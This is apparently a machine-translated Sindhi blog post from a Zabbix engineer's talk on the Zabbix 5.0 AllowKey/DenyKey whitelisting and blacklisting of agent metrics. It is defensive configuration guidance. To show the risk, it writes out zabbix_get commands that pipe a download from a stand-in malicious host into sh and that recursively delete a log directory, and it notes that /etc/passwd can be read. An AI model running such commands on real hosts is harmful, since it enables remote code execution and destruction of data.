پرو هوسٽر > بلاگ > انتظاميه > Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ ايجنٽ-سائيڊ ميٽرڪس لاءِ

Tikhon Uskov، انٽيگريشن انجنيئر، زيبڪس

ڊيٽا سيڪيورٽي مسئلا

Zabbix 5.0 ۾ هڪ نئين خصوصيت آهي جيڪا توهان کي اجازت ڏئي ٿي ته سسٽم ۾ سيڪيورٽي کي بهتر ڪرڻ لاءِ Zabbix ايجنٽ استعمال ڪندي ۽ پراڻي پيٽرولر کي تبديل ڪري ٿي RemoteCommands کي فعال ڪريو.

ايجنٽ جي بنياد تي سسٽم جي سيڪيورٽي ۾ بهتري ان حقيقت مان نڪرندي آهي ته هڪ ايجنٽ وڏي تعداد ۾ ممڪن طور تي خطرناڪ ڪارناما انجام ڏئي سگهي ٿو.

  • ايجنٽ تقريبن ڪا به معلومات گڏ ڪري سگهي ٿو، بشمول ڳجهي يا ممڪن طور تي خطرناڪ معلومات، ترتيب واري فائلن، لاگ فائلن، پاسورڊ فائلن، يا ڪنهن ٻئي فائلن کان.

مثال طور، zabbix_get يوٽيلٽي استعمال ڪندي توهان استعمال ڪندڙن جي فهرست، انهن جي گهر ڊاريڪٽريز، پاسورڊ فائلون وغيره تائين رسائي حاصل ڪري سگهو ٿا.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

zabbix_get utility استعمال ڪندي ڊيٽا تائين رسائي

نوٽيس. ڊيٽا صرف ان صورت ۾ حاصل ڪري سگهجي ٿي جڏهن ايجنٽ کي لاڳاپيل فائل تي پڙهڻ جي اجازت هجي. پر، مثال طور، فائل /etc/passwd/ سڀني استعمال ڪندڙن طرفان پڙهڻ جي قابل.

  • ايجنٽ شايد ممڪن طور تي خطرناڪ حڪمن تي عمل ڪري سگھن ٿا. مثال طور، چاٻي *system.run[]** توهان کي نيٽ ورڪ نوڊس تي ڪنهن به ريموٽ ڪمانڊز تي عمل ڪرڻ جي اجازت ڏئي ٿي، جنهن ۾ Zabbix ويب انٽرفيس مان هلندڙ اسڪرپٽ شامل آهن جيڪي ايجنٽ جي پاسي تي حڪمن تي عمل پڻ ڪن ٿيون. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • لينڪس تي، ايجنٽ روٽ استحقاق کان سواء ڊفالٽ طور تي هلندو آهي، جڏهن ته ونڊوز تي اهو هڪ خدمت جي طور تي هلندو آهي ۽ فائل سسٽم تائين غير محدود رسائي آهي. ان جي مطابق، جيڪڏهن انسٽاليشن کان پوء زيبڪس ايجنٽ جي پيٽرولن ۾ ڪا به تبديلي نه ڪئي وئي آهي، ايجنٽ کي رجسٽري، فائيل سسٽم تائين رسائي آهي ۽ WMI سوالن تي عمل ڪري سگهي ٿو.

اڳوڻي نسخن ۾ پيٽرولر فعال ڪريو RemoteCommands = 0 صرف چاٻي سان ميٽرڪ کي غير فعال ڪرڻ جي اجازت ڏني وئي *system.run[]** ۽ ويب انٽرفيس مان اسڪرپٽ هلائيندڙ، پر انفرادي فائلن تائين رسائي کي محدود ڪرڻ، اجازت ڏيڻ يا غير فعال ڪرڻ جو ڪو طريقو نه هو جيڪو ايجنٽ سان نصب ڪيو ويو هو، يا انفرادي پيٽرولر جي استعمال کي محدود ڪرڻ.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

Zabbix جي اڳوڻي نسخن ۾ EnableRemoteCommand پيٽرول استعمال ڪندي

AllowKey/DenyKey

Zabbix 5.0 اهڙي غير مجاز پهچ کان بچاءَ ۾ مدد ڪري ٿو وائيٽ لسٽ ۽ بليڪ لسٽ مهيا ڪندي ايجنٽ جي طرف ميٽرڪس کي اجازت ڏيڻ ۽ رد ڪرڻ لاءِ.

Zabbix 5.0 ۾ سڀ ڪيچ، بشمول *system.run[]** فعال آهن، ۽ ٻه نوان ايجنٽ ترتيب ڏيڻ جا اختيار شامل ڪيا ويا آهن:

AllowKey = - اجازت ڏنل چيڪ؛

DenyKey = - منع ٿيل چيڪ؛

ڪٿي آھي ھڪ اھم نالو جو نمونو پيٽرولر سان جيڪو استعمال ڪري ٿو ميٽا اچار (*).

AllowKey ۽ DenyKey ڪيچون توهان کي اجازت ڏين ٿيون يا اجازت ڏين ٿيون انفرادي ميٽرڪس کي هڪ مخصوص نموني جي بنياد تي. ٻين ترتيبن جي پيٽرولن جي برعڪس، AllowKey/DenyKey پيٽرولر جو تعداد محدود ناهي. هي توهان کي واضح طور تي وضاحت ڪرڻ جي اجازت ڏئي ٿو ته ايجنٽ سسٽم ۾ ڇا ڪري سگهي ٿو چيڪن جو هڪ وڻ ٺاهي - عملدار چابيون، جتي ترتيب جنهن ۾ اهي لکيل آهن هڪ تمام اهم ڪردار ادا ڪري ٿو.

قاعدن جي تسلسل

ضابطا چيڪ ڪيا ويا آهن ترتيب ۾ جنهن ۾ اهي داخل ٿيل آهن ترتيب واري فائل ۾. پهرين ميچ کان اڳ قاعدن جي مطابق چيڪ ڪيو ويو آهي، ۽ جيترو جلدي ڊيٽا جي عنصر جي ڪنجي نموني سان ملائي ٿي، ان کي اجازت يا رد ڪيو ويندو آهي. ان کان پوء، ضابطي جي چڪاس بند ٿي ويندي آهي ۽ باقي چاٻين کي نظر انداز ڪيو ويندو آهي.

تنهن ڪري، جيڪڏهن هڪ عنصر ٻنهي جي اجازت ۽ رد قاعدي سان ملندو آهي، نتيجو ان تي منحصر هوندو ته قاعدي جي ترتيب واري فائل ۾ پهريون آهي.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

2 مختلف ضابطا ساڳي نموني ۽ هڪ ڪنجي سان vfs.file.size[/tmp/file]

AllowKey/DenyKey چابيون استعمال ڪرڻ جو حڪم:

  1. صحيح ضابطا،
  2. عام ضابطا،
  3. منع ڪندڙ ضابطو.

مثال طور، جيڪڏهن توهان کي ڪنهن خاص فولڊر ۾ فائلن تائين رسائي جي ضرورت آهي، توهان کي پهريان انهن تائين رسائي جي اجازت ڏيڻ گهرجي، ۽ پوء هر شي کي رد ڪريو جيڪي قائم ڪيل اجازتن ۾ نه هجن. جيڪڏهن رد قاعدو پهريون استعمال ڪيو ويندو، فولڊر تائين رسائي کي رد ڪيو ويندو.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

صحيح تسلسل

جيڪڏهن توهان کي اجازت ڏيڻ جي ضرورت آهي 2 يوٽيلٽيز کي هلائڻ جي ذريعي *system.run[]**، ۽ رد ڪرڻ وارو قاعدو پهريون بيان ڪيو ويندو، افاديت شروع نه ڪئي ويندي، ڇاڪاڻ ته پهريون نمونو هميشه ڪنهن به چاٻي سان ملندو، ۽ بعد ۾ ضابطن کي نظرانداز ڪيو ويندو.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

غلط تسلسل

پيٽ رڻ

بنيادي اصول

نمونو وائلڊ ڪارڊ سان هڪ اظهار آهي. Metacharacter (*) ڪنهن مخصوص پوزيشن تي ڪنهن به اکرن جي ڪنهن به انگ سان ملندو آهي. Metacharacters استعمال ڪري سگھجن ٿا ٻئي اهم نالو ۽ پيٽرولن ۾. مثال طور، توھان سختي سان بيان ڪري سگھو ٿا پھرئين پيٽرولر کي متن سان، ۽ ايندڙ کي وائلڊ ڪارڊ طور بيان ڪريو.

پيرا ميٽرز کي چورس بریکٹس ۾ بند ڪيو وڃي [].

  • system.run[* - غلط
  • vfs.file*.txt] - غلط
  • vfs.file.*[*] - ساڄو

وائلڊ ڪارڊ استعمال ڪرڻ جا مثال.

  1. اهم نالو ۽ پيٽرول ۾. انهي صورت ۾، چاٻي هڪ اهڙي چاٻي سان لاڳاپيل ناهي جنهن ۾ هڪ پيٽرولر شامل نه آهي، ڇاڪاڻ ته نموني ۾ اسان اشارو ڪيو آهي ته اسان کي حاصل ڪرڻ چاهيون ٿا هڪ خاص پڇاڙيء جي ڪنجي جو نالو ۽ پيٽرولر جو هڪ مخصوص سيٽ.
  2. جيڪڏهن نمونو چورس بریکٹ استعمال نٿو ڪري، نمونو سڀني ڪنجين کي اجازت ڏئي ٿو جيڪي پيٽرولر تي مشتمل نه آهن ۽ سڀني ڪنجين کي رد ڪري ٿو جيڪي مخصوص پيٽرولر تي مشتمل آهن.
  3. جيڪڏهن ڪيئي مڪمل لکيل آهي ۽ پيرا ميٽرز وائلڊ ڪارڊ طور بيان ڪيا ويا آهن، ته اها ڪنهن به ساڳي ڪيئي کي ڪنهن به پيٽرول سان ملائي ويندي ۽ چورس بریکٹس کان سواءِ ڪيئي سان نه ملندي، يعني ان کي اجازت ڏني ويندي يا رد ڪئي ويندي.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

پيراگراف ڀرڻ جا ضابطا.

  • جيڪڏهن هڪ ڪنجي پيٽرولر سان استعمال ڪرڻ جو ارادو ڪيو ويو آهي، پيٽرولر کي ترتيب ڏيڻ واري فائل ۾ بيان ڪيو وڃي. پيرا ميٽرز کي ميٽا اچار جي طور تي بيان ڪيو وڃي. اهو ضروري آهي ته احتياط سان ڪنهن به فائل تائين رسائي کان انڪار ڪيو وڃي ۽ حساب ۾ رکڻ گهرجي ته ڪهڙي معلومات ميٽرڪ مختلف اسپيلنگ تحت مهيا ڪري سگهي ٿي - پيرا ميٽرن سان ۽ بغير.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

پيرا ميٽرن سان چابيون لکڻ جون خاصيتون

  • جيڪڏهن هڪ ڪنجي پيٽرولر سان بيان ڪئي وئي آهي، پر پيٽرولر اختياري آهن ۽ هڪ ميٽا اچار جي طور تي بيان ڪيو ويو آهي، هڪ ڪنجي بغير پيٽرولر حل ڪيو ويندو. مثال طور، جيڪڏهن توهان CPU تي لوڊ بابت معلومات حاصل ڪرڻ کي غير فعال ڪرڻ چاهيو ٿا ۽ وضاحت ڪريو ته سسٽم.cpu.load[*] ڪيئي کي غير فعال ڪيو وڃي، اهو نه وساريو ته ڪيچي بغير پيٽرولر جي اوسط لوڊ قيمت واپس ڪندي.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

پيراگراف ۾ ڀرڻ جا ضابطا

نوٽ

adjustment

  • ڪجھ ضابطا صارف طرفان تبديل نه ٿا ڪري سگھجن، مثال طور، دريافت جا ضابطا يا ايجنٽ آٽو-رجسٽريشن ضابطا. AllowKey/DenyKey ضابطا هيٺ ڏنل پيٽرول تي اثر انداز نٿا ٿين:
    - ميزبان نالو آئٽم
    - HostMetadataItem
    - HostInterfaceItem

نوٽيس. جيڪڏهن ايڊمنسٽريٽر هڪ ڪي کي غير فعال ڪري ٿو، جڏهن سوال ڪيو وڃي ٿو، زيبڪس ان بابت معلومات مهيا نه ڪندو آهي ڇو ته ميٽرڪ يا ڪيٽي 'ڪيٽيگري' ۾ اچي ٿي.ناڪاري'. ريموٽ حڪمن تي عمل ڪرڻ تي پابندي بابت معلومات پڻ ايجنٽ لاگ فائلن ۾ ظاهر نه ڪئي وئي آهي. اهو حفاظتي سببن جي ڪري آهي، پر ڊيبگنگ کي پيچيده ڪري سگهي ٿو جيڪڏهن ميٽرڪ ڪنهن سببن جي ڪري اڻ سڌريل درجي ۾ اچي وڃن.

  • توهان کي خارجي ترتيب واري فائلن کي ڳنڍڻ لاءِ ڪنهن مخصوص آرڊر تي ڀروسو نه ڪرڻ گهرجي (مثال طور، الفابيٽ جي ترتيب ۾).

ڪمانڊ لائن افاديت

ضابطن کي ترتيب ڏيڻ کان پوء، توهان کي پڪ ڪرڻ جي ضرورت آهي ته هر شي صحيح ترتيب ڏنل آهي.

توھان استعمال ڪري سگھوٿا ھڪڙو ٽن اختيارن مان:

  • زبڪس ۾ ميٽرڪ شامل ڪريو.
  • ٽيسٽ سان zabbix_agentd. اختيار سان Zabbix ايجنٽ -پرنٽ (-p) سڀني ڪنجين کي ڏيکاري ٿو (جيڪي ڊفالٽ جي اجازت ڏين ٿيون) سواءِ انهن جي جن کي ترتيب جي اجازت نه آهي. ۽ اختيار سان ٽيسٽ (-t) هڪ منع ٿيل ڪنجي لاءِ واپس ويندي 'اڻ سڌريل شيءِ جي چاٻي'.
  • ٽيسٽ سان zabbix_get. افاديت zabbix_get اختيار سان -k واپس ڪندس 'ZBX_NOTSUPPORTED: اڻڄاتل ميٽرڪ'.

اجازت ڏيو يا انڪار ڪريو

توھان ھڪڙي فائل تائين رسائي کي رد ڪري سگھو ٿا ۽ تصديق ڪري سگھو ٿا، مثال طور، يوٽيلٽي استعمال ڪندي zabbix_getانهي فائل تائين رسائي رد ڪئي وئي آهي.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

**

نوٽيس. پيراگراف ۾ حوالن کي نظرانداز ڪيو ويو آهي.

انهي صورت ۾، اهڙي فائل تائين رسائي جي اجازت ٿي سگهي ٿي مختلف رستي ذريعي. مثال طور، جيڪڏهن هڪ symlink ان کي ڏسجي ٿو.

Zabbix 5.0 ۾ ايجنٽ-سائيڊ ميٽرڪس لاءِ بليڪ لسٽ ۽ وائيٽ لسٽ سپورٽ

اهو تجويز ڪيل قاعدن کي لاڳو ڪرڻ لاء مختلف اختيارن کي جانچڻ جي صلاح ڏني وئي آهي، ۽ پڻ اڪائونٽ ۾ رکڻ جي امڪانن کي روڪڻ جي امڪانن کي.

سوال ۽ جواب

سوال. قاعدن، اجازتن ۽ ممنوعن کي بيان ڪرڻ لاءِ پنهنجي ٻولي سان اهڙو پيچيده نمونو ڇو چونڊيو ويو؟ اهو استعمال ڪرڻ ممڪن ڇو نه هو، مثال طور، باقاعده اظهار جيڪي زيبڪس استعمال ڪندا آهن؟

جواب ڏيو. هي هڪ ريجڪس ڪارڪردگي جو مسئلو آهي ڇو ته عام طور تي صرف هڪ ايجنٽ آهي ۽ اهو ميٽرڪ جي وڏي تعداد کي چيڪ ڪري ٿو. ريجڪس ڪافي بھاري آپريشن آھي ۽ اسين ھزارين ميٽرڪ ھن طريقي سان چيڪ نٿا ڪري سگھون. وائلڊ ڪارڊ - هڪ آفاقي، وڏي پيماني تي استعمال ٿيل ۽ سادو حل.

سوال. ڇا شامل فائلون الفابيٽ جي ترتيب ۾ شامل نه آھن؟

جواب ڏيو. جيتري قدر مون کي خبر آهي، اهو اندازو لڳائڻ ناممڪن آهي ته جيڪڏهن توهان قاعدن کي مختلف فائلن ۾ پکڙيل آهيو ته ڪهڙي ترتيب ۾ قاعدا لاڳو ڪيا ويندا. مان سڀني AllowKey/DenyKey ضابطن کي گڏ ڪرڻ جي صلاح ڏيان ٿو ھڪڙي فائل ۾ شامل ڪريو، ڇاڪاڻ ته اھي ھڪ ٻئي سان رابطو ڪن ٿا، ۽ ھن فائل سميت.

سوال. Zabbix 5.0 ۾ اختيار 'فعال ڪريو RemoteCommands=' ترتيب واري فائل مان غائب آهي، ۽ صرف AllowKey/DenyKey موجود آهن؟

جواب. ها اهو صحيح آهي.

Спасибо за внимание!

جو ذريعو: www.habr.com

تبصرو شامل ڪريو